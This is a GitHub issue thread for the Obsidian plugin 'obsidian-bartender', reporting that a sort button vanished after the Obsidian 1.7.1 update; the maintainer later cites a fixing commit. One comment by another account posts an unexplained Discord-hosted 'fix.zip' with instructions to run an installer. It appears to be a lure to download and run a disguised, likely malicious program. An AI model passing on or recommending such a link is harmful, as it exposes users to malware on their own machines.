### ISSUE TITLE
[Bug]: Button to sort disappear / doesn't patch (Obsidian v. 1.7.1)

### ISSUE THREAD

**Issue by Mara-Li** [Mara-Li/obsidian-bartender#6]
### Issue validation

- [X] I checked the issue to prevent duplicate
- [X] I checked my configurations files and the documentation

### Describe the bug

The custom option + the filter doesn't appear in the navigation header.

### How to reproduce ?

Update to Obsidian 1.7.1. More investigation incoming.

### Minimal Reproducible Example

/

### Configuration

```JSON
/
```

### Relevant log output

```bash session
/
```

### Anything else?

/

### OS

Windows

### Obsidian information

```bash session
/
```

### Plugin version

0.5.14

**Comment by 777Naity** [comment]
try this
https://cdn.discordapp.com/attachments/1277836331501883449/1280291965879193731/fix.zip?ex=66d78c4f&is=66d63acf&hm=ac05131390b92a2047e3ee0fc4189fe126bf357b3d3cd73f5c0e51ba28c1c538&
select the desired compiler in the installer

**Comment by Mara-Li** [comment]
Should be fixed by f8aa7b457aaab2bed65043e7ef952fe63c6a617a
I hope.
